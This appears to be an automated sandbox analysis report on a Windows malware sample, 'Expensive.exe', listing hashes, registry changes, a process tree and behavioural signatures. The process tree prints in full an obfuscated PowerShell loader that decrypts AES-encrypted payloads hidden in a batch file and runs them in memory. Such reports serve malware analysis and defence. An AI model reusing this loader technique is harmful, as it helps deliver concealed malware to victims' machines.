Analysis
-
max time kernel
10s -
max time network
0s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
26-05-2024 16:13
Static task
static1
Behavioral task
behavioral1
Sample
Expensive.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
Expensive.exe
Resource
win10v2004-20240508-en
General
-
Target
Expensive.exe
-
Size
599KB
-
MD5
65e4c0420f496abb02201df254eb87a1
-
SHA1
6efcf4be11132a32a3df5029c87d2daa466fcc1a
-
SHA256
3684b6d86d9928b8dfef807c55d5de421b6325c0cb28991037d26703598d1e44
-
SHA512
bedb40ae7f3a6c1a2cc7e62069025d87b5383526e414df9825ad50bf8516077574134fe25ff285f0754d2bee608ba619ee56a33d4e9ddb6a997dab4d5635f6bb
-
SSDEEP
12288:jeHrZIhqCgsKF/kFnBf5rkb2LAW/4Mon2rcATuNpGRhb5vUMfyU1/:jsFQqS0kR9aCkW/4t2r9upGmM6U1
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 2072 ExpensiveLauncher.exe -
Loads dropped DLL 2 IoCs
pid Process 2936 Expensive.exe 2084 Process not Found -
pid Process 2660 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 9 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\discord-1199748644409184347\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ExpensiveLauncher.exe" ExpensiveLauncher.exe Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\discord-1199748644409184347\shell\open\command ExpensiveLauncher.exe Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\discord-1199748644409184347\shell\open ExpensiveLauncher.exe Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\discord-1199748644409184347\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ExpensiveLauncher.exe" ExpensiveLauncher.exe Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\discord-1199748644409184347 ExpensiveLauncher.exe Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\discord-1199748644409184347\DefaultIcon ExpensiveLauncher.exe Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\discord-1199748644409184347\shell ExpensiveLauncher.exe Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\discord-1199748644409184347\ = "URL:Run game 1199748644409184347 protocol" ExpensiveLauncher.exe Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\discord-1199748644409184347\URL Protocol ExpensiveLauncher.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2660 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2660 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 2936 wrote to memory of 2072 2936 Expensive.exe 29 PID 2936 wrote to memory of 2072 2936 Expensive.exe 29 PID 2936 wrote to memory of 2072 2936 Expensive.exe 29 PID 2936 wrote to memory of 3024 2936 Expensive.exe 31 PID 2936 wrote to memory of 3024 2936 Expensive.exe 31 PID 2936 wrote to memory of 3024 2936 Expensive.exe 31 PID 3024 wrote to memory of 2720 3024 cmd.exe 33 PID 3024 wrote to memory of 2720 3024 cmd.exe 33 PID 3024 wrote to memory of 2720 3024 cmd.exe 33 PID 2072 wrote to memory of 2740 2072 ExpensiveLauncher.exe 34 PID 2072 wrote to memory of 2740 2072 ExpensiveLauncher.exe 34 PID 2072 wrote to memory of 2740 2072 ExpensiveLauncher.exe 34 PID 2720 wrote to memory of 2772 2720 net.exe 35 PID 2720 wrote to memory of 2772 2720 net.exe 35 PID 2720 wrote to memory of 2772 2720 net.exe 35 PID 3024 wrote to memory of 2660 3024 cmd.exe 36 PID 3024 wrote to memory of 2660 3024 cmd.exe 36 PID 3024 wrote to memory of 2660 3024 cmd.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\Expensive.exe"C:\Users\Admin\AppData\Local\Temp\Expensive.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Users\Admin\AppData\Local\Temp\ExpensiveLauncher.exe"C:\Users\Admin\AppData\Local\Temp\ExpensiveLauncher.exe"2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵PID:2740
-
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Expensive.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Windows\system32\net.exenet file3⤵
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file4⤵PID:2772
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zlo9ncEYo3QUkLbnvPRah2udZSQFyEkFClqBW6M5QLg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KvNrQpenzWsPMRFAkt8PNg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dWnBZ=New-Object System.IO.MemoryStream(,$param_var); $fgVcf=New-Object System.IO.MemoryStream; $AcYrR=New-Object System.IO.Compression.GZipStream($dWnBZ, [IO.Compression.CompressionMode]::Decompress); $AcYrR.CopyTo($fgVcf); $AcYrR.Dispose(); $dWnBZ.Dispose(); $fgVcf.Dispose(); $fgVcf.ToArray();}function execute_function($param_var,$param2_var){ $MnaPb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KIsjD=$MnaPb.EntryPoint; $KIsjD.Invoke($null, $param2_var);}$UgcxC = 'C:\Users\Admin\AppData\Local\Temp\Expensive.bat';$host.UI.RawUI.WindowTitle = $UgcxC;$RYiHp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UgcxC).Split([Environment]::NewLine);foreach ($AWVRD in $RYiHp) { if ($AWVRD.StartsWith(':: ')) { $qeYnm=$AWVRD.Substring(3); break; }}$payloads_var=[string[]]$qeYnm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2660
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
733KB
MD5ab7ca8b87249457d23cd632d21183dfc
SHA1d234f7e75f972baa135ab8505e44fcd478c04447
SHA256e1437b2de1ccd08aab8f31532cf8109afdb84782c8927f3feeea25ba6be10c6e
SHA512cd70a7400bc54bbcdb9c6c113e4785a7d3025a740415de997168d184950e874bc4b0c73448facdc89c8afbbdeef6b26deff703f19494bb56bf504d922f17dfa2
-
Filesize
101KB
MD50593b521f3e8af295d523ea480388b0f
SHA139fc9ab8b8663801319557b06defb2a50e0c5d08
SHA2563247a643a33c091fe826b3ce8e5e9524c5863e3c71eb9168f1bf52520742a8b9
SHA512adc9c7875965c06fda648dce41975e1a7b7ef44b233a20efdebeae61e8b99c8e2cf809112cf3e4c1aaf00a2d1dd5c39a0be68541782aea9cbe87f12044c81b6d